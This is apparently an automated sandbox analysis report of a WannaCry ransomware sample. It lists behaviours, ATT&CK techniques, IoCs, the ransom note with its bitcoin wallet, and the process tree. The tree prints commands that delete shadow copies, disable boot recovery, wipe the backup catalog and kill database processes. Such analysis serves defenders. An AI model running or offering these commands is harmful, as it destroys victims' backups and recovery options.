wannacry | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo/blob/master/Ransomware/WannaCry[.]exe

Analysis

max time kernel
91s
max time network
99s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
19-08-2024 14:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Ransomware/WannaCry.exe

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD299A.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD29A1.tmp	WannaCry.exe

Executes dropped EXE 5 IoCs

pid	Process
4708	WannaCry.exe
3272	!WannaDecryptor!.exe
756	!WannaDecryptor!.exe
1440	!WannaDecryptor!.exe
2552	!WannaDecryptor!.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	WannaCry.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
27	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
3156	taskkill.exe
1392	taskkill.exe
4640	taskkill.exe
1980	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133685516213913484"	chrome.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	chrome.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2552	!WannaDecryptor!.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
3924	chrome.exe
3924	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeShutdownPrivilege	3924	chrome.exe
Token: SeCreatePagefilePrivilege	3924	chrome.exe
Token: SeDebugPrivilege	3156	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe
3924	chrome.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3272	!WannaDecryptor!.exe
3272	!WannaDecryptor!.exe
756	!WannaDecryptor!.exe
756	!WannaDecryptor!.exe
1440	!WannaDecryptor!.exe
1440	!WannaDecryptor!.exe
2552	!WannaDecryptor!.exe
2552	!WannaDecryptor!.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3924 wrote to memory of 3648	3924	chrome.exe	81
PID 3924 wrote to memory of 3648	3924	chrome.exe	81
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 2512	3924	chrome.exe	83
PID 3924 wrote to memory of 3908	3924	chrome.exe	84
PID 3924 wrote to memory of 3908	3924	chrome.exe	84
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85
PID 3924 wrote to memory of 1404	3924	chrome.exe	85

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Ransomware/WannaCry.exe
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff3e8ccc40,0x7fff3e8ccc4c,0x7fff3e8ccc58
  2⤵
  PID:3648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2000,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1996 /prefetch:2
  2⤵
  PID:2512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1384,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2392 /prefetch:3
  2⤵
  PID:3908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2072,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2536 /prefetch:8
  2⤵
  PID:1404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3096 /prefetch:1
  2⤵
  PID:4228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:2132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4784,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4792 /prefetch:8
  2⤵
  PID:3324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4480,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4588 /prefetch:8
  2⤵
  PID:3708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4448,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5104 /prefetch:8
  2⤵
  PID:2432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4544,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4520 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:4656
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:4708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 298081724078046.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3120
  - - C:\Windows\SysWOW64\cscript.exe
      cscript //nologo c.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:2372
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe f
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3272
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im MSExchange*
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3156
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Microsoft.Exchange.*
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:4640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlserver.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:1392
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlwriter.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe c
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:756
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b !WannaDecryptor!.exe v
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2248
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe v
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:1440
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3104
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4968
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5268,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5056 /prefetch:8
  2⤵
  PID:3780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5328,i,1866565961243536532,15798134473726106355,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5096 /prefetch:8
  2⤵
  PID:3324

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4356

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
3b3345ab9c27d2e6924d4dc225e817f3

SHA1
74a7b5e96f81d63e0e5c86968ee178e7a683199f

SHA256
7a5fbe9929d953e492d2d0d643f81c460701946a5a91d07381c947c0b43d4554

SHA512
ff2beb35f7bcc5316dc59f2b29c524035394f7ee2b36521d34e0144bc332644020fc4c7cf8714d99a8c4cf48f66995c29f46d65024c9cf33f2a2e74c0e6abfb4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
66f47347a7d22b725234a86bb2aced6d

SHA1
24e263a2b32aeef06461bcfa2e0623dfd71f4105

SHA256
686ff8b1ed3a51300d7967014d0773d11718192d737df6b22b708929f8887a9d

SHA512
3f23ae66e1c3ebc2e528d907ad2906239baee2e92e9eade659a4713a8e5e6dbd1245df813f65647c2a03fcd1378acfbfc3d4d6f1de4e162ab95d21e42d8c0e06

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
02d1612d9dc14ddecae1089e242d1d19

SHA1
c834c9e862596f484fab1779a7413e15a647c4db

SHA256
89b6702b80a47c0bf5b6a968acae0f7cf62584fa43c678a96be0ba4119fbff69

SHA512
b891c056fa0f96ad0cfcd3f80fedd13da24f177433196ce3da7232000dcfac0bbd07557228fa2b1fddb512930bf5a4183ed370b4858ac0fc299df9010ce1dc2c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
bbdbfe111a56d4713f6d06e0615a192f

SHA1
4dfe75b4709bb8c2d7bbf8eafc2484df36106077

SHA256
2713a3fb496aec8e1b6a9e032fbc88b1260d55145ba293a4968fc8ed13d73cbf

SHA512
01650501747eae312c7499c97778b3314de26c70e6c5f50819c4eec6d99e1ff2c982e375097b8d73323ad1b8398ee7ba7feb869375457cd96a544caff937df0a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
507f4e0590c28b66e9f285e6c867968e

SHA1
c2e65763a2da89bf32d29f8cde0db80d25761a8b

SHA256
d106bca97504a4f33e8e06d97c17a2b74f2e809a7e7a82cd4584a3352b2cbaa3

SHA512
e1ed4d82763dbcf442b459c0f9235b783c2138375cafcfcfd23828f4acfe8f5e8643079e3b52e357db56d6115e4ea3220d42fe15c5ffec391c026b84dc0da0c7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
0c85d2451426af8611ad079c17c12b1f

SHA1
d5d47bf9c470a30a7ecd17b894392b53bc55b8d1

SHA256
588ea2de8ea8b8eea61a74142f3c000c4ab196486ec6752f92332896cea7b3b2

SHA512
e2677e9e0d1ebe716d68ec6097fe621e8f79f8750b8d800835dfdd3b61e1431fab32dcec84d78a0baa76a770bc1f4e83aec07e024f784b336cba974e23eff4bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
781d740c8a6b4124435b9e7be1eb5556

SHA1
07478ac67b7c63229e74989819a42923e479ea69

SHA256
4e438082a097b66cf8f4cb4aea8dd0a99c8be228b27cf97fb826e83845b386f6

SHA512
